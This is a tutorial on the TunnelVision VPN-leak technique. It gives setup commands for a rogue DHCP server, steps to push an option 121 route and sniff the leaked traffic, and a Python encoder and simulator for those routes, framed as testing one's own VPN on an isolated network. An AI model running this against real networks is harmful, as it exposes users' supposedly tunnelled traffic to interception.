TunnelVision VPN Vulnerability Tutorial

How to pull a target's traffic out of its VPN tunnel from the local network, without the tunnel ever going down.



TunnelVision is a local-network VPN leaking technique, published by Leviathan Security, that lets an attacker on the same LAN read, drop, and in some cases modify traffic the target believes is going through its VPN. The attacker runs a rogue DHCP server and uses DHCP option 121 (classless static routes) to push routes that are more specific than the routes the VPN client installs, so the target's operating system sends matching traffic out of the physical interface instead of into the tunnel. The tunnel itself stays up, so kill switches that watch the tunnel state are not triggered, and there is no complete fix for every major operating system. This tutorial walks through installing, configuring, and using the TunnelVision proof-of-concept to check whether your own VPN setup is affected.

Installation

TunnelVision is a set of Bash scripts that configure and drive an ISC DHCP server (isc-dhcp-server). The repository is fetched with git, so make sure git is installed on the attack machine.

Steps to Install TunnelVision

  1. Clone the Repository:
    git clone https://github.com/leviathansecurity/TunnelVision.git
    cd TunnelVision

Setting it up

Once cloned, run the two setup scripts from the repository directory. They need root because they configure and start the system DHCP server. Only serve an isolated test network (enp0s8 in the commands below); a rogue DHCP server on a shared network will hand out leases, and routes, to every client on it.

  1. Setup Commands:

    sudo ./configdhcpserver.sh
    sudo ./startup.sh
  2. Utility Commands:

    • cat /etc/dhcp/dhcpd.conf - Shows the current DHCP server configuration
    • sudo ~/TunnelVision/pushrouteconfig.sh - Pushes the demo DHCP option 121 route for 8.8.8.8/32 over the attacker-controlled interface
    • sudo ~/TunnelVision/norouteconfig.sh - Switches back to pushing no routes, so you have a control case for testing
    • sudo systemctl status isc-dhcp-server - Shows the current status of the DHCP server
    • sudo systemctl restart isc-dhcp-server - Restarts the DHCP server; required after any manual edit of the config file
    • sudo systemctl start isc-dhcp-server - Starts the DHCP server
    • sudo systemctl stop isc-dhcp-server - Stops the DHCP server
    • sudo journalctl -u isc-dhcp-server.service | tail -n 50 - Shows the last 50 log lines from the service (look here for DHCPDISCOVER/DHCPACK lines from the target)
    • watch "journalctl -u isc-dhcp-server.service | tail -n 50" - Shows the last 50 log lines and refreshes them (every 2 s by default)
    • sudo tcpdump -i enp0s8 - Shows the traffic on the internal (target-facing) interface; replace enp0s8 with your own interface name, and append a tcpdump filter such as icmp to narrow it to the relevant traffic

Using it

Once the DHCP server is up and serving the target network, walk through the following steps.

  1. The target machine has to obtain a DHCP lease from the attack server, so connect it to the network the rogue DHCP server is serving, with no other DHCP server present.
  2. On the target machine, install a VPN client and connect to the VPN.
  3. On the attack DHCP server, push the demo DHCP option 121 route (8.8.8.8/32): sudo ./pushrouteconfig.sh. DHCP options are applied when the client obtains or renews its lease, so if the route does not appear on the target, reconnect it to the network or renew its lease.
  4. On the victim machine, show the route table and observe that there is a route for 8.8.8.8 that goes over a non-VPN interface:
    • Linux (Debian) command: ip route (or ip route get 8.8.8.8, which prints exactly the interface the kernel will use)
    • Windows command: route print
  5. Ping 8.8.8.8 from the victim machine: ping 8.8.8.8
  6. Observe that the ping either succeeds or is dropped, depending on whether the attacker's next hop forwards the traffic.
  7. (Optional) Install Wireshark or tcpdump on the victim host and confirm which interface the ICMP traffic is using.
    • If the ping is not working, observe that the ICMP never appears on the VPN interface: the traffic is dropped before it reaches the tunnel, which is the selective denial-of-service behaviour.
    • If the ping is working, observe that it is NOT going over the VPN tunnel.
  8. On the attacker DHCP server, observe that you can read the unencrypted traffic: sudo tcpdump -i eth0 icmp (replace eth0 with the interface you are serving DHCP over, enp0s8 in the examples above). In both cases the VPN client still reports that it is connected, which is why kill switches do not react.
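The steps above only show the effect in the routing table. The following Python script is an added example, not code from the TunnelVision repository or from Leviathan Security: it encodes a DHCP option 121 classless static route exactly as RFC 3442 lays it out on the wire, renders the equivalent isc-dhcpd configuration lines (the usual recipe of declaring option 121 as an array of octets; the TunnelVision scripts may write their config differently), and runs a longest-prefix-match lookup over a constructed routing table to show why the pushed 8.8.8.8/32 beats the VPN's routes for that destination while everything else stays in the tunnel. The gateway 192.168.56.1, the interface names eth0 and tun0, and the 0.0.0.0/1 plus 128.0.0.0/1 pair used to model the VPN's default-route override are all assumptions chosen for the demo.

```python
"""
Added example (not code from the TunnelVision repository): encode a DHCP
option 121 classless static route as defined in RFC 3442, render the
equivalent isc-dhcpd configuration lines, and run a longest-prefix-match
lookup over a constructed VPN-style routing table to show why the pushed
/32 route wins over the VPN's routes for the same destination.
"""
import ipaddress
from dataclasses import dataclass


def encode_option121(routes):
    """Encode (destination CIDR, gateway) pairs into RFC 3442 option 121 bytes.

    Each entry is: 1 byte prefix length, then only the significant octets of
    the destination (ceil(prefixlen / 8) of them), then the 4-octet gateway.
    """
    out = bytearray()
    for dest, gateway in routes:
        net = ipaddress.IPv4Network(dest, strict=True)
        nsig = (net.prefixlen + 7) // 8
        out.append(net.prefixlen)
        out += net.network_address.packed[:nsig]
        out += ipaddress.IPv4Address(gateway).packed
    return bytes(out)


def decode_option121(data):
    """Inverse of encode_option121; raises ValueError on a truncated payload."""
    routes = []
    i = 0
    while i < len(data):
        prefixlen = data[i]
        i += 1
        nsig = (prefixlen + 7) // 8
        dest = data[i:i + nsig]
        gateway = data[i + nsig:i + nsig + 4]
        if len(dest) != nsig or len(gateway) != 4:
            raise ValueError("truncated option 121 payload")
        i += nsig + 4
        network = ipaddress.IPv4Address(dest + b"\x00" * (4 - nsig))
        routes.append((f"{network}/{prefixlen}", str(ipaddress.IPv4Address(gateway))))
    return routes


def dhcpd_config_lines(routes):
    """isc-dhcpd has no built-in name for option 121, so the common recipe is
    to declare it as an array of octets and then list the encoded bytes."""
    octets = ", ".join(str(b) for b in encode_option121(routes))
    return [
        "option rfc3442-classless-static-routes code 121 = array of unsigned integer 8;",
        f"option rfc3442-classless-static-routes {octets};",
    ]


@dataclass
class Route:
    dest: ipaddress.IPv4Network
    dev: str


def build_table(pushed_routes, lan_dev="eth0", vpn_dev="tun0"):
    """Constructed routing table (assumption): the physical default route plus
    the two /1 routes many VPN clients install to override the default without
    deleting it. Routes learned via DHCP land on the physical interface."""
    table = [
        Route(ipaddress.IPv4Network("0.0.0.0/0"), lan_dev),
        Route(ipaddress.IPv4Network("0.0.0.0/1"), vpn_dev),
        Route(ipaddress.IPv4Network("128.0.0.0/1"), vpn_dev),
    ]
    for dest, _gateway in pushed_routes:
        table.append(Route(ipaddress.IPv4Network(dest), lan_dev))
    return table


def egress_device(table, dst):
    """Longest-prefix match, the rule the kernel FIB applies regardless of the
    order in which the routes were added."""
    ip = ipaddress.IPv4Address(dst)
    best = None
    for route in table:
        if ip in route.dest and (best is None or route.dest.prefixlen > best.dest.prefixlen):
            best = route
    return best.dev if best else None


if __name__ == "__main__":
    # Constructed demo route: 8.8.8.8/32 via a hypothetical attacker gateway.
    demo = [("8.8.8.8/32", "192.168.56.1")]
    print(encode_option121(demo).hex())                  # 2008080808c0a83801
    print("\n".join(dhcpd_config_lines(demo)))
    print(egress_device(build_table([]), "8.8.8.8"))     # tun0 before the push
    print(egress_device(build_table(demo), "8.8.8.8"))   # eth0 after the push
    print(egress_device(build_table(demo), "1.1.1.1"))   # tun0: other traffic unaffected
```

The point of the lookup is that the leak does not depend on route metrics or on which route was installed last: a /32 is always more specific than the /1 routes a VPN client uses to capture the default route, so the kernel picks the physical interface for that one destination and the VPN client never sees the packets. To leak more than one destination, or a whole prefix, add more (destination, gateway) pairs to the list; the encoder emits them back to back in the same option.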